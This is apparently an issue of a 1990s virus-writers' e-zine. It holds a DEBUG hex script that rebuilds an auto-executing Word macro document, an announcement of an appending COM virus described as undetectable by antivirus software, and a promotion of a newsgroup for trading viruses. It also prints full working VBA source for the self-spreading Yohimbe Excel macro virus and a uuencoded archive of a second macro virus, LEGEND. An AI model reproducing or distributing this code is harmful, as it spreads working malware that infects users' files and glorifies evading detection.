E 2120 6C 00 02 00 00 00 03 00 61 09 08 00 00 00 00 00
E 2130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00
E 2140 41 40 F2 FF A1 00 22 00 16 44 65 66 61 75 6C 74
E 2150 20 50 61 72 61 67 72 61 70 68 20 46 6F 6E 74 00
E 2160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00
E 2170 00 00 04 00 01 03 00 00 00 00 FF FF FF FF 00 03
E 2180 00 00 A1 09 00 00 05 00 00 03 00 00 01 03 00 00
E 2190 06 00 4D 00 0A 44 61 72 6B 20 4E 69 67 68 74 0B
E 21A0 43 3A 5C 44 4F 43 36 2E 44 4F 43 0A 44 61 72 6B
E 21B0 20 4E 69 67 68 74 28 43 3A 5C 57 49 4E 41 50 50
E 21C0 53 5C 4D 53 4F 46 46 49 43 45 5C 57 49 4E 57 4F
E 21D0 52 44 36 5C 41 52 43 48 49 45 45 2E 44 4F 43 FF
E 21E0 01 05 00 55 00 00 00 01 00 FF FF 6A 08 00 00 70
E 21F0 00 00 00 02 00 00 00 09 03 00 00 55 8D 01 00 03
E 2200 00 FF FF DA 08 00 00 95 01 00 00 02 00 00 00 79
E 2210 03 00 00 55 DE 02 00 00 00 FF FF 6F 0A 00 00 EF
E 2220 02 00 00 02 00 00 00 0E 05 00 00 55 82 06 00 02
E 2230 00 FF FF 5E 0D 00 00 1B 00 00 00 02 00 00 00 FD
E 2240 07 00 00 55 CF 07 00 04 00 FF FF 79 0D 00 00 89
E 2250 01 00 00 02 00 00 00 18 08 00 00 10 37 00 08 41
E 2260 75 74 6F 4F 70 65 6E 01 00 06 41 72 63 68 69 65
E 2270 01 00 08 41 75 74 6F 45 78 65 63 01 00 07 41 75
E 2280 74 6F 4E 65 77 01 00 09 41 75 74 6F 43 6C 6F 73
E 2290 65 01 00 11 05 00 00 00 06 41 52 43 48 49 45 00
E 22A0 01 00 07 41 55 54 4F 4E 45 57 00 06 00 08 41 55
E 22B0 54 4F 45 58 45 43 00 02 00 08 41 55 54 4F 4F 50
E 22C0 45 4E 00 07 00 09 41 55 54 4F 43 4C 4F 53 45 00
E 22D0 40 43 61 6E 6F 6E 20 20 42 4A 43 2D 34 31 30 30
E 22E0 00 4C 50 54 31 3A 00 43 41 4E 4F 4E 42 4A 00 43
E 22F0 61 6E 6F 6E 20 20 42 4A 43 2D 34 31 30 30 00 00
E 2300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2310 04 00 01 94 00 6E 00 0F 0E 80 01 01 00 01 00 EA
E 2320 0A 6F 08 64 00 01 00 07 00 68 01 02 00 00 00 68
E 2330 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2360 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01
E 2370 01 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00
E 2380 00 00 00 18 00 00 00 00 00 00 00 00 00 01 00 00
E 2390 00 00 00 00 00 00 00 00 00 0B 00 43 61 6E 6F 6E
E 23A0 20 20 42 4A 43 2D 34 31 30 30 00 00 00 00 00 00
E 23B0 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00
E 23C0 00 6F 08 EA 0A 6F 08 EA 0A 6F 08 EA 0A 00 00 00
E 23D0 00 18 00 00 00 00 00 00 00 01 00 34 21 00 00 F8
E 23E0 2A 00 00 40 00 1E 00 40 1F 6E 29 00 00 00 00 00
E 23F0 00 43 61 6E 6F 6E 20 20 42 4A 43 2D 34 31 30 30
E 2400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2410 00 00 04 00 01 94 00 6E 00 0F 0E 80 01 01 00 01
E 2420 00 EA 0A 6F 08 64 00 01 00 07 00 68 01 02 00 00
E 2430 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2460 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00
E 2470 00 01 01 00 00 01 00 00 00 01 00 00 00 00 00 00
E 2480 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 01
E 2490 00 00 00 00 00 00 00 00 00 00 00 0B 00 43 61 6E
E 24A0 6F 6E 20 20 42 4A 43 2D 34 31 30 30 00 00 00 00
E 24B0 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00
E 24C0 00 00 00 6F 08 EA 0A 6F 08 EA 0A 6F 08 EA 0A 00
E 24D0 00 00 00 18 00 00 00 00 00 00 00 01 00 34 21 00
E 24E0 00 F8 2A 00 00 40 00 1E 00 40 1F 6E 29 00 00 00
E 24F0 00 00 00 02 80 01 00 00 00 00 00 00 00 00 00 08
E 2500 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2510 00 31 00 15 16 90 01 00 00 54 69 6D 65 73 20 4E
E 2520 65 77 20 52 6F 6D 61 6E 00 0C 16 90 01 02 00 53
E 2530 79 6D 62 6F 6C 00 0B 26 90 01 00 00 41 72 69 61
E 2540 6C 00 22 00 04 00 01 08 88 18 00 00 D0 02 00 00
E 2550 68 01 00 00 00 00 DE 1B 01 66 DE 1B 01 66 00 00
E 2560 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2570 00 00 00 00 00 00 04 00 83 10 00 00 00 00 00 00
E 2580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2590 00 00 00 00 24 03 28 00 00 00 00 00 00 00 0A 44
E 25A0 61 72 6B 20 4E 69 67 68 74 0A 44 61 72 6B 20 4E
E 25B0 69 67 68 74 00 00 00 00 00 00 00 00 00 00 00 00
E 25C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 25D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 25E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 25F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 26A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 26B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 26C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 26D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 26E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 26F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
RCX
2600
W
Q
-----------------------_END_---------------------------
The Coconut Virus Resurected
By God@rky & Virus Bits & Bytes Magazine
A few months ago, The Coconut Virus debuted on God@rky's Virus Heaven. Since then, apparently the virus has made it's way around, as F-Protect now detects it as "coconut.1323".
Hence, it was time for a new version. Enter COCO-AP! (coconut.1870). Available with this issue is the new version. You will find with the archive of this Issue (#4) the file "COCO-AP!.ZIP" in it, is the file "COCO-AP!.COM". What follows is the low-down on this new virus. It is not detectable as a strain, but will probably be considered as a member of the newly found Coconut virus family.
The New Coconut Virus, Coconut.1870 (referred to as COCO-AP! throughout the rest of this article) is explained as being appending this time as opposed to its overwriting ancestor (coconut.1323), but it still remains as undetectable as the 1323 virus. COCO-AP! is a .COM infector which *DOES NOT* infect COMMAND.COM or files lesser than 128 bytes or larger than 60,000 bytes (60k). Infected Files will show an increase in size of 1,870 bytes.
COCO-AP! is non-resident using encrypting and anti-tracer technologies. It infects 2 files each time it or an infected file is executed, using the dot-dot infection method.
The Payload is non-destructive. On December 25th (Christmas) and December 31st (New Years Eve) the virus will not infect, but it will change 40x25 displays to 40x50 and prompts the coconut wishing it's victims A Merry Christmas and A Happy New Year.
Currently this virus is confirmed as being Undetectable by the following AntiVirus Software Packages (But it is probably safe to say nothing will currently detect this virus on a system):
- (FPROT) F-Protect v2.25
- (TBAV) Thunderbyte AntiVirus v7.06
- (AVP) AVP v2.2
- (SCAN) McAfee Scan (Whatever the current Version is)
- (NAV) Norton Antivirus v3.0
It is quite possible that in the future we will see the Coconut virus mutate again and see it become Resident, or possibly Multipartite or even become a boot sector infector. Stay Tuned!
Computers, Viruses & The Long Arm Of The Law
Written By
God@rky Of Virus Bits & Bytes Magazine
Over the history of the Computer Underground, I think it's biggest enemy has always been the mainstream press. National or International media attention has always brought in opinions from those whom are not familiar with the territory they are covering. The Computer Underground houses many of the hazy areas to which the general population of media employees know little about.
Last Summer, the LordNatas v666 Bug written by Rickdogg of Virus Bits and Bytes magazine was unleashed on Rickdogg's school's computer network. Most of the Hub-bub however didn't come from the virus itself, but from the editorials Rickdogg wrote on his webpage (Pipeline USA), aiming insults and personal opinions at authority figures in his school. None of which were slanderous (to my memory) or defamatious. He also however threatened his classmates.
Shortly after being expelled from this school, or maybe during this process (The details are a bit fuzzy), this whole topic became subject of the local newspaper's editorial section, in which people blamed his upbringing, and various other little quips about someone they knew nothing about. Rickdogg endured all this ridicule, with no means of rebuttal as he lost his Pipeline USA account in the process of this. While he now has the means to voice his opinion and tell a partial side to his story at his new site located at the Information Liberation Front, he has decided to have it published in Virus Bits & Bytes Magazine. So here are the words straight from Rickdogg's fingers to your screen:
Dear VBB Magazine,
This is the infamous RickDogg replying finally to all the bold and rude statements made in the editorial section about my fight against the Kanawha County school board. To be frank, some of these editorials were ridiculous and showed just how ignorant people are of computers and law.
I have a right to Freedom Of Speech. Period. If you do not agree to this, then go live in another country. I can call anybody what i want to call them, and they can do nothing about it. If i want to stand up and call E.J Smith a fool or a moron or a dumb bitch, then I can do it. It is also ridiculous to call me stupid for saying how i feel about certain people. I find that honest, even if the thoughts were not that comforting towards the individuals. I am not, I repeat not sorry for what I called my teachers or staff personnel. I am not going to back down from them any longer. I merely voiced my opinion and if they don't like it, then they can go to hell for all i care. It was also uncalled for by blaming my parents on raising a bad child. I am an excellent child that just so happens likes to voice my opinion. I am not ashamed or bashful by what I think and society cannot accept true honesty from a person. People were appalled that an honors student thought 'bad things' about teachers. Do you people even know what is going on? Teachers are called a lot worse than what I called them, but I just choose to put my topics on my web page and not say it to their face. How is that different?
The one thing I am truly sorry for was threatening my classmates. That was completely uncalled for and unjust. I should have used better judgement when I wrote my homepage material. If i had, then I would probably be at Capital High School right now.
The issue of the actual virii incident itself took a back seat with all the talk about my homepage and my comments. The virii did no harm, and posed no threat to the computer network at Capital High. There was also no lost time on the network for any students due to the system being shut down to 'clean' the virii. Mr. Hart even testified that the virii only took 30 seconds to remove. The virii were just there for a joke, to show off if you will, my hacking skills. That was the entire purpose of the incident. Not to gain attention, not to get back at a friend or destroy the entire computer network. I am not ashamed nor shy to the fact that I specialize in computer virii and hacking. I enjoy this 'hobby' very much and I spend a great deal of time learning and practicing this past-time. As of this date, I have over 11,000 virii in my collection along with numerous documents from my hacking exploits. I just wish that people would use this case to learn what is to come in the future as society moves closer and closer to a computer dominated world. What I did would be considered amateur by my standards, as I could have done far worse damage without even leaving a trace. I write my own virii that are undetected my Anti-virus software, so do not EVER think you are safe with one of those. This is only the beginning of what is to come. Remember, you have been warned.
As far as School life now goes, I love East Bank. It has provided me an opportunity to relax and enjoy my senior year of high school. The administration, the faculty and the students have treated me one hundred times better than I was treated at Capital. This whole incident has thus turned into a blessing in disguise. I am truly happy and not ashamed to attent this fine school. I have been accepted with open arms by everyone and I am finally looking forward to getting up and attending school every morning.
As far as future plans, it looks like I will attend West Virginia Institute of Technology at Montgomery and double major in Electrical engineering and Computer Science. I also will be bringing my home page up again with new and exciting material dealing with this whole incident as well as all my virii in my collection. It seemed that my previous site was shut down due to the content of the page. This time, however, this will not be a problem. Please feel free to email me with any questions you have about my situation or computers in general.
Regards,
RickDogg
We at Virus Bits & Bytes Magazine are happy to have the chance to print Rickdogg's response, in continuing with the tradition of America and the values it was founded upon and allowing people to speak freely. Funny how the ACLU didn't seem to have interest enough to stick their head into this one. Go Figure.
Virus Related Newsgroups
Written By
God@rky Of Virus Bits & Bytes Magazine
Just about anyone who has been in either the Vx or AV worlds for any period of time, has run across the UseNet newsgroups pertaining to the subject of viruses. Here is a brief rundown of what you would have found 2 months ago:
- comp.virus - This is a heavily moderated newsgroup who's primary existence regardless of what you are told by the moderator or it's inhabitants, is to serve the AV community, and postings of source code or Vx ideas is not welcomed in any fashion. If you fancy a world where everything you read has been pre- selected for content and opinion to be mentally palletable, then this is the place for you.
- alt.comp.virus- This newsgroup is alot like comp.virus, except for that it is unmoderated. Your posts will always appear on this newsgroup unless for some reason someone at your ISP is filtering your posts, at which point you will probably want to consider switching ISP's. Posting source code or dropper files is not recommended here. They will appear, but the infamous George Wenzel as well as a possible host of other people will probably send in letters of request for the termination of your account with your ISP. So it is best to be aware of the TOS (Terms Of Service) agreement which your ISP has with it's subscribers. The primary argument here is that you are posting binaries to a discussion group.
- alt.comp.virus.source.code - This newsgroup is more or less a FREE-FOR-ALL. Just about anything goes here, because for the most part, the AV community has stayed away from the News- group, as the title of the newsgroup cannot really be twisted as being an anti-virus forum. On the average, you will see 5-10 viruses posted a week, 10% of which will be new ones.
So this doesn't leave the Vx community much of a forum to speak freely. Sure there is always the IRC, but many of us have better things to do with our time than hang out on the IRC. A good example of the Vx community on the IRC was at #virus on Effnet. Yeah, usually around 10 people logged into the channel, and maybe 1 or 2 lines of dialog every 5 to 10 minutes having nothing to do with viruses. I would be willing to bet that most serious virus authors would rather be coding, than waiting for some newbie who has just discovered scripts to come in and make an attempt at a channel takeover. Up until now, E-mail has been on our side.
Months ago, many will recall that I wrote an effort to get people to come to alt.comp.virus and post and post and post, to even things out a bit. It was successful in some ways and a failure in others. PhreeX who was helping tremendously with this effort, came up with an ultimately better solution to this problem, and now that it has arrived, I will tell you all about it.
New, to the alt. hierchy of newsgroups; PhreeX, God@rky, VBB and those who feel Freedom of Speech is important welcome in the new newsgroup alt.binaries.com.pro-virus...
At last, a newsgroup that yu can subscribe to. A newsgroup that is definitely there to allow the transmittal of binary virus posting. A newsgroup that not everyone's ISP may necessarily carry, but I think most will.
Currently I am the only person who has posted to it. Possibly the only person who has subscribed to it at this point. I would like to see others join in as well. This is an unrestricted medium, one which AVer's are in denial of it's prosperity to us. They are banking that your ISP will not carry it, in their interests. So I ask all of you who would like a second medium in which to discuss and spread your work, send your postmaster a letter today. A nice one, an undemanding one, merely stating that you would like to subscribe to alt.binaries.com.pro-virus, you don't need to explain why usually. And you don't need to explain what would appear in it. Just give it a try. I look forward to seeing more people in there.
Frisk's F-PROT Hidden Paramater
by Phardera [VBB]
e-mail: phardera@hotmail.com
I found some hidden parameters in F-PROT 2.25 (and last?):
- /SN
- /GURU
- /ONLY
- /INT_IO
- /ANALYZE
- /NOCHECK
- /PARANOID
and in F-MACRO (not F-MACROW):
- /REMOVEALL
- /IDENTIFICATION
The YohimBe Virus
Here's the Excel Macro Virus Yohimbe for you... I have disassembled it so you can see what is going on!
MACRO AUTO_OPEN
Sub Auto_Open()
On Error GoTo FixIt 'Errorhandler
'Set up infected book as a variable
Dim SaveBook As String
SaveBook = ActiveWorkbook.Name
Application.ScreenUpdating = False 'Don't want to see it working
' Check Personal.xls for prior infection
Windows("PERSONAL.XLS").Visible = True
If SheetExists("Exec") Then
Windows("PERSONAL.XLS").Visible = False
GoTo AlreadyInfected
Else
' Infect Personal.xls
Workbooks(SaveBook).Activate
Sheets("Exec").Visible = True
Sheets("Exec").Select
Sheets("Exec").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
Workbooks("PERSONAL.XLS").Activate
ActiveWorkbook.Sheets("Exec").Visible = False
ActiveWindow.Visible = False
Workbooks("PERSONAL.XLS").Save
AlreadyInfected: ' Return to originally opened book
Workbooks(SaveBook).Activate
ActiveWorkbook.Sheets("Exec").Visible = False
End If
GoTo OhKay
FixIt: ' In case of error infect everything that's open
DipDing
End
OhKay: ' Set time to infect all open books
Application.OnTime EarliestTime:=TimeValue("4:00 PM"), _
Procedure:="DipDing"
End Sub
MACRO DIPDING
Sub DipDing() ' Routine to infect all open books
On Error GoTo DipFix ' Set up error handler
Application.ScreenUpdating = False
Dim book As Object
Dim CurrBook As String
CurrBook = ActiveWorkbook.Name
'Check each open book for infection, infect if not already infected
For Each book In Workbooks
book.Activate
If SheetExists("Exec") Then
GoTo Done
Else
Windows("PERSONAL.XLS").Visible = True
Windows("PERSONAL.XLS").Activate
Sheets("Exec").Visible = True
Sheets("Exec").Copy Before:=book.Sheets(1)
Sheets("Exec").Visible = False
ActiveSheet.PageSetup.RightHeader = "Yohimbe"
book.Save
Done:
End If
Next book
'Cover your tracks
Windows("PERSONAL.XLS").Activate
Sheets("Exec").Visible = False
Windows("PERSONAL.XLS").Visible = False
Workbooks(CurrBook).Activate
Application.OnTime EarliestTime:=TimeValue("4:45 PM"), _
Procedure:="PayLoad"
DipFix:
End Sub
Function SheetExists(sName As String) As Boolean 'Infection checker function
Dim aSheet As Object
SheetExists = False
For Each aSheet In ActiveWorkbook.Sheets
If (StrComp(aSheet.Name, sName, 1) = 0) Then
SheetExists = True
End If
Next aSheet
End Function
MACRO PAYLOAD
Sub PayLoad()
Cells.Select
Range("B1").Activate
Selection.RowHeight = 15
Selection.ColumnWidth = 2.5
Range("B9,C10,D11,D12,E13,F14,F15,G15,H15,I15,J15,K15,L15,M15,M14,N13,N12,N11,N10,N9,N8,N7,M7,L7,L8,L9,K7,J9,J8,J7,J6,J5,J4,J3,J2,I2,H2,H3,H4,H5,H6,H7,H8,H9,G7,F7,F8,F9,F10,E9,D8,C8,B8,H1,I1,J1").Select
With Selection.Interior
.ColorIndex = 16
.Pattern = xlSolid
.PatternColorIndex = xlAutomatic
End With
Range("F12").Select
ActiveCell.FormulaR1C1 = "FUCK YOU BUDDY"
Range("F12").Select
Selection.Font.Bold = True
With Selection.Font
.Name = "Arial"
.FontStyle = "Bold"
.Size = 16
End With
For mover = 1 To 20
Range("H1:J6").Select
Selection.Interior.ColorIndex = xlNone
Application.Wait Now + TimeValue("00:00:01")
Range("H6,H5,H4,H3,H2,H1,I1,J1,J2,I2,J3,J4,J5,J6").Select
With Selection.Interior
.ColorIndex = 16
.Pattern = xlSolid
.PatternColorIndex = xlAutomatic
End With
Application.Wait Now + TimeValue("00:00:01")
Next mover
Range("A4").Select
End Sub
EXCELMACRO.LEGEND
HERE IT IS! MY BRAND NEW EXCEL MACRO VIRUS COMPATIBLE WITH VERSIONS OF EXCEL 5 AND ABOVE. UPON SYSTEM INFECTION THE VIRUS CREATES A HIDDEN WORKBOOK CALLED "PERSONAL.XLS" IN THE EXCEL STARTUP DIRECTORY. FROM THEN ON ANY WORKBOOK OPENED HAS A HIDDEN MODULE INSERTED INTO IT CALLED "LEGEND". THE VIRUS HAS 2 MAIN (HARMLESS) PAYLOADS: A MESSAGE IS DISPLAYED ON A RANDOM DAY AND THE TOOLSMACRO MENU ITEM IS REMOVED. IF YOU THINK YOU CAN IMPROVE ON THIS VIRUS IN ANY WAY THEN PLEASE SEND ME ANY MODIFIED VARIANTS THAT YOU OR ANYBODY ELSE YOU KNOW PRODUCES. IF YOU FIND BUGS IN THIS VIRUS, WANT TO KNOW HOW TO HOOK MENU COMMANDS OR NEED A LIST OF MORE PAYLOADS THEN ALL YOU HAVE TO DO IS MAIL ME.
VBB OWNS THIS VIRUS AND ANY VARIANT PRODUCED BUT HOLDS NO RESPONSIBILITY FOR ANY DAMAGE CAUSED! PYRO PRODUCTIONS 1997.
PYRO <PYRO@ILF.NET>
======================CUT HERE===============================
begin 644 LEGEND.ZIP
M4$L#!!0``H`(`'U#(2*SFI+4:@```"<!```+````1DE,15])1"Y$25K3P@]X
MN;2T%/Q<PQ6<@EQ=713\W11\'9V#_!7"/(-"@ZT4(`H(F@`""JX1SJX^8-UZ
M/J[NKGXN"J@*")B@$!`)M#<@R-\EU#G$T]\O6,'0TM)<@0030(8X*OBZ^CJY
M!H%\$N;DI*!%I!L`4$L#!!0``H`(`"`A(2($EM/?A`(``!\(```*````3$5'
M14Y$+E185*U5[T_;,!#]7JG_PRT?1@(H(IJT"30FI;1LF6B+:&&;MFDRR;6U
M,'9D.]#NKY]_`&W44KIU^=+Z?._EW;NSLP.[VS[-Q@[TR"V">8Z@,\V1=4DN
M17R&8^2%W>Y+.J;<;?,Q(SYX(I%H+$SP,^$5D3,X2/8A.3Q\9W?32D^$M)#S
MF13P_:K5^FGC_T'NH+JV].)7OT0>1LU&6I:,YD13P>,^'TP0=9IK>F?DP3$$
M&1]AKH-FH\,+,.!FPW/XN"7H<^A(:>1^%$/A_WXR53*4S48V@D7^2X72N66(
M;64!I(:UID".":>_W>(QTU0?P'""?-4;%L"+RR[(P2SXVT%/"%-9SVE25
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
